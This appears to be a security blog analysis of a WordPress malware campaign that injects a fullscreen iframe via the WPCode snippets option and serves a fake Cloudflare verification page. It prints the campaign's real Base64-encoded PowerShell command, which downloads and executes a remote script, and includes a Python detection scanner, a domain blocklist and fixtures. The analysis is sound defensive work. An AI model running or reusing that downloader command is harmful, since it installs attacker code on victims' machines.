Malicious JavaScript Injects Fullscreen Iframe on WordPress Sites: A Security Analysis
In recent security investigations, a persistent JavaScript-based malware campaign targeting WordPress websites has come to light. This malicious script injects a fullscreen iframe that silently loads and forces users to interact with unsolicited content from suspicious external domains. Such attacks often serve objectives like ad fraud, fraudulent traffic generation, or social engineering scams.
Understanding the Threat: What Was Found?
The core malicious behavior involves aggressively embedding a fullscreen iframe sourced from dubious domains. This iframe appears without consent, fully overlaying the webpage, thereby limiting any legitimate user interaction.
Key characteristics of the malware include:
- Use of advanced evasion tactics such as anti-debugging routines that stall analysis if debugging tools are detected.
- Hijacking of browser functions like console methods to suppress logs and hinder detection.
- Persistent payload execution achieved via abuse of localStorage to control iframe display frequency.
- Selective targeting based on user-agent strings, focusing primarily on Windows users with popular browsers like Chrome, Firefox, Edge, and Opera.
Indicators of Compromise in WordPress
The malware was identified embedded within the WordPress database, specifically in the wp_options table under the option_name=wpcode_snippets entry. This location is significant because it corresponds to the WPCode plugin, commonly used to execute custom code snippets safely without altering theme files.
Unfortunately, attackers exploit this plugin’s capability to execute arbitrary code, surreptitiously injecting harmful scripts through the WordPress admin interface.
Malicious Domains Involved
The iframe loads content from the following suspicious domains, which have been flagged and blocklisted by multiple security vendors:
- capcloud.icu — widely reported for hosting deceptive content such as fake captchas.
- wallpaper-engine.pro — associated with malware delivery and fraudulent activity.
- Additional domains linked to the same hosting IP: wanderclean.com, ampunshifu.org, cdnstat.net, adoodlz.com, secretdinosaurcult.com, and weathersnoop.com.
These domains were confirmed through analysis tools like Sucuri SiteCheck and VirusTotal, which reported multiple detections for each.
In-Depth Malware Analysis
Anti-Debugging and Obfuscation Techniques
The malicious script initializes with a self-executing function applying various anti-debugging techniques such as infinite loops and misuse of JavaScript constructor functions. These tactics are designed to thwart reverse engineering by freezing execution when debugging tools are active.
Additionally, the script redefines native logging methods in the browser’s console (e.g., console.log, console.warn) to nullify outputs, effectively concealing suspicious activity during inspection.
User-Agent Filtering for Targeted Attacks
The payload performs checks on the visitor’s user-agent to selectively deploy the iframe on Windows devices using mainstream browsers. This precision increases the success rate of the attack and reduces detection by avoiding irrelevant platforms and bots.
Controlled Fullscreen Iframe Injection
The iframe injection mechanism incorporates view count caps via localStorage. The malicious iframe appears up to three times and automatically disappears after approximately four minutes, simulating a benign user experience while tricking visitors into believing a legitimate action (like a download) occurred.
Fake Cloudflare Verification and PowerShell Payload
One of the most deceptive elements is a counterfeit Cloudflare “Verify you are human” page served from capcloud.icu/captcha.html. This spoofed page mimics Cloudflare’s legitimate DDoS protection but instead prompts users to execute a disguised PowerShell command on their computers.
The provided command employs Base64 encoding to download and execute a malicious script silently, leading to remote payload delivery and possible system compromise:
cmd.exe /c "start /min powershell -nop -ep Bypass -eC aQB3AHIAIAAiAGgAdAB0AHAAOgAvAC8AMQA4ADAALgAxADcAOAAuADEAOAA5AC4ANwAvAG0AeQBjAGEAcAB0AGMAaABhAC4AaAB0AG0AbAAiACAAfAAgAGkAZQB4AA=="
Decoded, the command downloads a file from http://180.178.189.7/mycaptcha.html, which may contain further malicious scripts or instructions.
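The following Python is an added example for triaging the artifacts described in this analysis; it is not code from the original investigation or from any of the tools it names. It scans the raw text of a stored snippet (assumed to be the option_value of wpcode_snippets, obtained with WP-CLI’s wp option get or a direct database query) or of a fetched lure page for the traits discussed above: console method overrides, user-agent filtering, localStorage view counting, iframe creation, busy loops, the blocklisted domains listed earlier, and any PowerShell -EncodedCommand blob, which it decodes (Base64 over UTF-16LE, as PowerShell expects) so that hosts hidden inside the encoding surface in the report. The indicator regexes are this example’s own heuristics, not signatures from the sample; the two snippets and the lure page fragment are constructed fixtures, while the Base64 string is the one reported above.

```python
import base64
import re

# Domains the article reports as flagged for this campaign (from the page).
KNOWN_BAD_DOMAINS = {
    "capcloud.icu", "wallpaper-engine.pro", "wanderclean.com", "ampunshifu.org",
    "cdnstat.net", "adoodlz.com", "secretdinosaurcult.com", "weathersnoop.com",
}

# Heuristic patterns for the behaviours the article describes. These are this
# example's assumptions about how such code looks, not signatures from the sample.
INDICATORS = {
    "iframe_creation": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)"),
    "console_override": re.compile(r"console\.(?:log|warn|error|info|debug)\s*="),
    "localstorage_counter": re.compile(r"localStorage\.(?:getItem|setItem)\("),
    "user_agent_check": re.compile(r"navigator\.userAgent"),
    "infinite_loop": re.compile(r"while\s*\(\s*(?:true|1|!!\[\])\s*\)"),
}

# Host part of any http(s) URL (domain names and bare IPs alike).
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# A PowerShell invocation carrying an encoded command (-e/-ec/-enc/-EncodedCommand).
ENCODED_PS_RE = re.compile(
    r"powershell[^\n\"]*?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE,
)


def decode_encoded_command(b64):
    """Decode a PowerShell -EncodedCommand value: Base64 over UTF-16LE text."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def extract_hosts(text):
    """Return the set of hosts referenced by http(s) URLs in text."""
    return {m.group(1).lower() for m in URL_RE.finditer(text)}


def scan_snippet(text):
    """Scan a stored snippet (or a fetched lure page) for the campaign's traits."""
    lowered = text.lower()
    findings = {
        "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(text)),
        "known_bad_domains": sorted(d for d in KNOWN_BAD_DOMAINS if d in lowered),
        "decoded_commands": [],
    }
    hosts = extract_hosts(text)
    for m in ENCODED_PS_RE.finditer(text):
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # not a well-formed encoded command; skip it
        findings["decoded_commands"].append(decoded)
        hosts |= extract_hosts(decoded)  # hosts hidden inside the encoding
    findings["contacted_hosts"] = sorted(hosts)
    # A blocklisted domain or a decoded downloader is decisive on its own;
    # behavioural traits alone only reach "malicious" when several co-occur.
    score = (3 * len(findings["known_bad_domains"])
             + 3 * len(findings["decoded_commands"])
             + len(findings["indicators"]))
    findings["verdict"] = "malicious" if score >= 3 else ("review" if score else "clean")
    return findings


# Constructed, inert fixture modelled on the behaviour the article describes:
# it references the traits but never attaches the iframe to the document.
SAMPLE_SNIPPET = r"""
(function () {
  console.log = function () {}; console.warn = function () {};
  if (!/Windows/.test(navigator.userAgent)) { return; }
  var shown = parseInt(localStorage.getItem('shown') || '0', 10);
  var f = document.createElement('iframe');
  f.src = 'https://capcloud.icu/captcha.html';
})();
"""

# The encoded command the article reports from the fake verification page.
REPORTED_ENCODED_COMMAND = (
    "aQB3AHIAIAAiAGgAdAB0AHAAOgAvAC8AMQA4ADAALgAxADcAOAAuADEAOAA5AC4ANwAvAG0AeQBj"
    "AGEAcAB0AGMAaABhAC4AaAB0AG0AbAAiACAAfAAgAGkAZQB4AA=="
)

# Constructed fragment of a lure page that embeds that command for the user to paste.
SAMPLE_LURE_PAGE = (
    "<p>Verify you are human</p>\n"
    '<input id="cmd" value=\'cmd.exe /c "start /min powershell -nop -ep Bypass -eC '
    + REPORTED_ENCODED_COMMAND + '"\'>'
)

# Constructed benign snippet of the kind WPCode is normally used for.
BENIGN_SNIPPET = r"""
document.addEventListener('DOMContentLoaded', function () {
  console.log('theme ready');
  document.querySelector('.cta').addEventListener('click', function () {
    window.location.href = 'https://example.com/signup';
  });
});
"""

if __name__ == "__main__":
    for name, sample in [("stored snippet", SAMPLE_SNIPPET),
                         ("lure page", SAMPLE_LURE_PAGE),
                         ("benign snippet", BENIGN_SNIPPET)]:
        print(name, scan_snippet(sample))
```

Decoding the blob matters because the downloader URL never appears in clear text on the lure page; only after UTF-16LE decoding does the 180.178.189.7 host show up, which is why the scanner feeds decoded commands back through the host extractor. The scoring is deliberately conservative: a single blocklisted domain or decoded downloader is enough for a verdict, whereas behavioural traits such as a localStorage counter or a user-agent check are individually common in legitimate scripts and only count in aggregate.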
Impact and Risks
This fullscreen iframe malware campaign carries several significant risks:
- Visitor Experience Impact: The intrusive iframe disrupts legitimate interaction, damaging user trust and website reputation.
- Security Threats: It tricks users into running harmful PowerShell commands, potentially leading to full system compromise.
- Reputation and SEO Damage: Affected websites risk being blocklisted by security services, harming search engine rankings and user traffic.
Best Practices for Protection and Remediation
Site owners should adopt rigorous security practices to defend against and recover from infections like this:
- Keep WordPress Core, Plugins, and Themes Updated: Regularly applying updates closes vulnerabilities commonly exploited by attackers.
- Audit and Harden Plugin Usage: Disable or remove plugins that allow arbitrary code execution, especially those enabling admin-level code injection like WPCode snippets.
- Employ Web Application Firewalls (WAFs): WAFs can detect and block malicious JavaScript injections and unauthorized database manipulations.
- Enable File and Database Integrity Monitoring: Activate automatic alerts for any unauthorized changes to critical files or database entries.
- Implement Strong Access Controls: Enforce complex passwords, limit admin users, and disable file editing within the WordPress dashboard.
- Regular Malware Scanning: Use reputable malware scanners to detect infections early.
Conclusion
This malware campaign exemplifies how attackers exploit legitimate WordPress plugins and storage mechanisms to execute advanced JavaScript-based attacks. By injecting fullscreen iframes from malicious domains and tricking visitors with fake verification pages, this threat jeopardizes both website security and user safety.
Adhering to best security practices and leveraging robust monitoring tools remain essential for WordPress site owners aiming to mitigate these risks effectively.
References
- VirusTotal
- Sucuri SiteCheck
- WPCode Plugin Information
- OWASP Top 10 Web Application Security Risks – 2023 Report